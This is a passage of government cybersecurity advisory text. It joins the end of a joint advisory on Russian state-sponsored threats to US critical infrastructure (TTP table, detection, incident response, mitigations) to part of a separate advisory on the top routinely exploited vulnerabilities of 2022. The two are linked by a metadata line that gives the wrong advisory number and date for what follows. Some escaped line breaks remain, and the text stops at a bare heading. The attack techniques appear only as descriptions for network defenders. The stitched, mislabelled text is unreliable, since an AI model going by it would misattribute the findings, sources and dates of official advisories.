[BlackEnergy](<https://attack.mitre.org/versions/v10/software/S0089>) malware to steal user credentials and used its destructive malware component, KillDisk, to make infected computers inoperable. 
In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed [CrashOverride](<https://attack.mitre.org/versions/v10/software/S0604>) malware specifically designed to attack power grids.\n\nFor more information on recent and historical Russian state-sponsored malicious cyber activity, see the referenced products below or [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>).\n\n * Joint FBI-DHS-CISA CSA [Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://us-cert.cisa.gov/ncas/alerts/aa21-116a>)\n * Joint NSA-FBI-CISA CSA [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)\n * Joint FBI-CISA CSA [Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://www.cisa.gov/uscert/ncas/alerts/aa20-296a>)\n * Joint CISA-FBI CSA [APT Actors Chaining Vulnerabilities against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n * CISA\u2019s webpage [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA Alert [Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA18-074A>)\n * CISA ICS Alert: [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/ir-alert-h-16-056-01>)\n\nTable 1 provides common, publicly known TTPs employed by Russian state-sponsored APT actors, which map to the MITRE ATT&CK for Enterprise framework, version 10. **Note:** these lists are not intended to be all inclusive. 
Russian state-sponsored actors have modified their TTPs before based on public reporting.[[1](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)] Therefore, CISA, the FBI, and NSA anticipate the Russian state-sponsored actors may modify their TTPs as they deem necessary to reduce their risk of detection. \n\n_Table 1: Common Tactics and Techniques Employed by Russian State-Sponsored APT Actors_\n\nTactic | Technique | Procedure \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)] | Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)] | Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nReconnaissance [TA0043] | Phishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)] | Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)] | Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)] | Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] | Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nInitial Access [TA0001] | Supply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)] | Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)] | Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] | Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)] | Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nCredential Access [TA0006] | OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)] | Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nCredential Access [TA0006] | Steal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)] | Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredential Access [TA0006] | Credentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)] | Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nCredential Access [TA0006] | Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)] | Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nCredential Access [TA0006] | Unsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)] | Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)] | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic. 
\n \nFor additional enterprise TTPs used by Russian state-sponsored APT actors, see the ATT&CK for Enterprise pages on [APT29](<https://attack.mitre.org/versions/v10/groups/G0016>), [APT28](<https://attack.mitre.org/versions/v10/groups/G0007>), and the [Sandworm Team](<https://attack.mitre.org/versions/v10/groups/G0034>). For information on ICS TTPs see the [ATT&CK for ICS](<https://collaborate.mitre.org/attackics/index.php/Main_Page>) pages on the [Sandworm Team](<https://collaborate.mitre.org/attackics/index.php/Group/G0007>), [BlackEnergy 3](<https://collaborate.mitre.org/attackics/index.php/software/S0004>) malware, [CrashOverride](<https://collaborate.mitre.org/attackics/index.php/software/S0001>) malware, BlackEnergy\u2019s [KillDisk](<https://collaborate.mitre.org/attackics/index.php/software/S0016>) component, and [NotPetya](<https://collaborate.mitre.org/attackics/index.php/software/S0006>) malware.\n\n### Detection\n\nGiven Russian state-sponsored APT actors\u2019 demonstrated capability to maintain persistent, long-term access in compromised enterprise and cloud environments, CISA, the FBI, and NSA encourage all critical infrastructure organizations to:\n\n * **Implement robust log collection and retention.** Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, examples include: \n   * Native tools such as M365\u2019s Sentinel. \n   * Third-party tools, such as Sparrow, Hawk, or CrowdStrike's Azure Reporting Tool (CRT), to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. 
**Note:** for guidance on using these and other detection tools, refer to CISA Alert [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n * **Look for behavioral evidence or network and host-based artifacts** from known Russian state-sponsored TTPs. See table 1 for commonly observed TTPs. \n   * To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for multiple, failed authentication attempts across multiple accounts.\n   * To detect use of compromised credentials in combination with a VPS, follow the below steps: \n     * Look for suspicious \u201cimpossible logins,\u201d such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n     * Look for one IP used for multiple accounts, excluding expected logins.\n     * Look for \u201cimpossible travel.\u201d Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). **Note:** implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.\n   * Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n   * Look for suspicious privileged account use after resetting passwords or applying user account mitigations. 
\n * Look for unusual activity in typically dormant accounts.\n * Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.\n * For organizations with OT/ICS systems: \n * Take note of unexpected equipment behavior; for example, unexpected reboots of digital controllers and other OT hardware and software. \n * Record delays or disruptions in communication with field equipment or other OT devices. Determine if system parts or components are lagging or unresponsive.\n\n### Incident Response\n\nOrganizations detecting potential APT activity in their IT or OT networks should:\n\n 1. Immediately isolate affected systems. \n 2. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.\n 3. Collect and review relevant logs, data, and artifacts.\n 4. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 5. Report incidents to [CISA](<https://www.cisa.gov/uscert/report>) and/or the FBI via your [local FBI field office](<http://www.fbi.gov/contact-us/field>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n\n**Note:** for OT assets, organizations should have a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. Refer to the Mitigations section for more information.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for guidance on hunting or investigating a network, and for common mistakes in incident handling. 
CISA, the FBI, and NSA encourage critical infrastructure owners and operators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response. \n\n**Note: **organizations should document incident response procedures in a cyber incident response plan, which organizations should create and exercise (as noted in the Mitigations section). \n\n### Mitigations\n\nCISA, the FBI, and NSA encourage all organizations to implement the following recommendations to increase their cyber resilience against this threat.\n\n### Be Prepared\n\n#### _Confirm Reporting Processes and Minimize Coverage Gaps_\n\n * Develop internal contact lists. Assign main points of contact for a suspected incident as well as roles and responsibilities and ensure personnel know how and when to report an incident.\n * Minimize gaps in IT/OT security personnel availability by identifying surge support for responding to an incident. Malicious cyber actors are [known to target organizations on weekends and holidays](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) when there are gaps in organizational cybersecurity\u2014critical infrastructure organizations should proactively protect themselves by minimizing gaps in coverage.\n * Ensure IT/OT security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any identified IOCs and TTPs for immediate response. 
(See table 1 for commonly observed TTPs).\n\n#### _Create, Maintain, and Exercise a Cyber Incident Response, Resilience Plan, and Continuity of Operations Plan_\n\n * Create, maintain, and exercise a cyber incident response and continuity of operations plan.\n * Ensure personnel are familiar with the key steps they need to take during an incident and are positioned to act in a calm and unified manner. Key questions: \n * Do personnel have the access they need?\n * Do they know the processes?\n * For OT assets/networks, \n * Identify a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. \n * Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.\n * Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.\n * Implement data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.\n * In addition to backing up data, develop recovery documents that include configuration settings for common devices and critical OT equipment. 
This can enable more efficient recovery following an incident.\n\n### Enhance your Organization\u2019s Cyber Posture\n\nCISA, the FBI, and NSA recommend organizations apply the best practices below for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n\n#### _Identity and Access Management_\n\n * Require multi-factor authentication for all users, without exception.\n * Require accounts to have strong passwords and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access.\n * Secure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials. \n * Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.\n * Disable the storage of clear text passwords in LSASS memory.\n * Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.\n * Implement Credential Guard for Windows 10 and Server 2016 (Refer to [Microsoft: Manage Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage>) for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).\n * Minimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious activity such as \u201cKerberoasting\u201d takes advantage of Kerberos\u2019 TGS and can be used to obtain hashed credentials that attackers attempt to crack.\n * Set a [strong](<https://www.us-cert.cisa.gov/ncas/tips/ST04-002>) password policy for service accounts.\n * Audit Domain Controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity. \n * Secure accounts.\n * Enforce the principle of least privilege. 
Administrator accounts should have the minimum permission they need to do their tasks.\n * Ensure there are unique and distinct administrative accounts for each set of administrative tasks.\n * Create non-privileged accounts for privileged users and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n\n#### _Protective Controls and Architecture_\n\n * Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor or malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Enable strong spam filters. \n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Filter emails containing executable files to prevent them from reaching end users.\n * Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.\n\n**Note:** CISA, the FBI, and NSA also recommend, as a longer-term effort, that critical infrastructure organizations implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks.\n\n * Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.\n * Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. 
Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.\n\n#### _Vulnerability and Configuration Management_\n\n * Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. \n * Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program. \n * Consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.\n * Use industry recommended antivirus programs. \n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures.\n * Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.\n * Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.\n * Disable all unnecessary ports and protocols \n * Review network security device logs and determine whether to shut off unnecessary ports and protocols. 
Monitor common ports and protocols for command and control activity.\n * Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.\n * Ensure OT hardware is in read-only mode.\n\n### Increase Organizational Vigilance\n\n * Regularly review reporting on this threat. Consider signing up for CISA notifications to receive timely information on current security issues, vulnerabilities, and high-impact activity.\n\n### Resources\n\n * For more information on Russian state-sponsored malicious cyber activity, refer to [cisa.gov/Russia.](<https://www.us-cert.cisa.gov/russia>)\n * Refer to CISA Analysis Report [Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a>) for steps for guidance on strengthening your organizations cloud security practices.\n * Leaders of small businesses and small and local government agencies should see [CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) for guidance on developing an actionable understanding of implementing organizational cybersecurity practices.\n * Critical infrastructure owners and operators with OT/ICS networks, should review the following resources for additional information: \n * NSA and CISA joint CSA NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems\n * CISA factsheet Rising Ransomware Threat to Operational Technology Assets for additional recommendations.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. 
You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to [rewardsforjustice.net/malicious_cyber_activity](<https://www.rewardsforjustice.net/malicious_cyber_activity.html>).

### Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, the FBI, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or NSA.

### Revisions

 * January 11, 2022: Initial Version
 * January 25, 2022: Updated broken link
 * February 28, 2022: Updated broken link

Advisory AA22-011A, “Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure”, published 2022-03-01: <https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-011a>. CVEs associated with this advisory: CVE-2018-13379, CVE-2019-10149, CVE-2019-11510, CVE-2019-1653, CVE-2019-19781, CVE-2019-2725, CVE-2019-7609, CVE-2019-9670, CVE-2020-0688, CVE-2020-1472, CVE-2020-14882, CVE-2020-4006, CVE-2020-5902, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2022-42475, CVE-2022-47966.

### **SUMMARY**

The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):

 * United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
 * Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
 * Canada: Canadian Centre for Cyber Security (CCCS)
 * New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
 * United Kingdom: National Cyber Security Centre (NCSC-UK)

This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE).
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.

The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.

 * **Vendors, designers, and developers**: Implement [secure-by-design and -default principles and tactics](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> "Security-by-Design and -Default") to reduce the prevalence of vulnerabilities in your software.
   * **Follow the Secure Software Development Framework (SSDF)**, also known as [SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> "NIST SP 800-218"), and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.
   * **Prioritize secure-by-default configurations**, such as eliminating default passwords, or requiring additional configuration changes to enhance product security.
   * **Ensure that published CVEs include the proper CWE field** identifying the root cause of the vulnerability.
 * **End-user organizations**:
   * **Apply timely patches to systems**. **Note**: First check for signs of compromise if CVEs identified in this CSA have not been patched.
   * Implement a centralized patch management system.
   * **Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers**.
   * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

Download the PDF version of this report: AA23-215A PDF (PDF, 980.90 KB)

### **TECHNICAL DETAILS**

#### **Key Findings**

In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.

Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure; the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).

Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, widespread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVEs or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.

#### **Top Routinely Exploited Vulnerabilities**

Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:

 * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>). This vulnerability, affecting Fortinet SSL VPNs, was also [routinely exploited in 2020](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a> "Top Routinely Exploited Vulnerabilities") and [2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> "2021 Top Routinely Exploited Vulnerabilities"). The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
 * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), [**CVE-2021-31207**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>), [**CVE-2021-34523**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>). These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (i.e., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
 * [**CVE-2021-40539**](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>). This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability [began in late 2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-259a> "APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus") and [continued throughout 2022](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF> "Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors").
 * [**CVE-2021-26084**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>). This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies), could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
 * [**CVE-2021-44228**](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>). This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[[1](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance>)] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
 * [**CVE-2022-22954**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954>), [**CVE-2022-22960**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960>). These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 [began in early 2022](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b> "Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control") and attempts continued throughout the remainder of the year.
 * [**CVE-2022-1388**](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388>). This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
 * [**CVE-2022-30190**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190>). This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
 * [**CVE-2022-26134**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>). This critical RCE vulnerability affects Atlassian Confluence and Data Center.
The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability ([CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)), which cyber actors also exploited in 2022.

_Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022_

| CVE | Vendor | Product | Type | CWE |
|---|---|---|---|---|
| [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | Fortinet | FortiOS and FortiProxy | SSL VPN credential exposure | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (ProxyShell) | Microsoft | Exchange Server | RCE | [CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html>) |
| [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) (ProxyShell) | Microsoft | Exchange Server | Security Feature Bypass | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) (ProxyShell) | Microsoft | Exchange Server | Elevation of Privilege | [CWE-287: Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html>) |
| [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | Zoho ManageEngine | ADSelfService Plus | RCE/Authentication Bypass | [CWE-287: Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html>) |
| [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | Atlassian | Confluence Server and Data Center | Arbitrary code execution | [CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html>) |
| [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (Log4Shell) | Apache | Log4j2 | RCE | [CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html>); [CWE-20: Improper Input Validation](<https://cwe.mitre.org/data/definitions/20.html>); [CWE-400: Uncontrolled Resource Consumption](<https://cwe.mitre.org/data/definitions/400.html>); [CWE-502: Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html>) |
| [CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954>) | VMware | Workspace ONE Access and Identity Manager | RCE | [CWE-94: Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html>) |
| [CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960>) | VMware | Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | [CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html>) |
| [CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388>) | F5 Networks | BIG-IP | Missing Authentication Vulnerability | [CWE-306: Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html>) |
| [CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190>) | Microsoft | Multiple Products | RCE | None Listed |
| [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) | Atlassian | Confluence Server and Data Center | RCE | [CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html>) |

#### **Additional Routinely Exploited Vulnerabilities**

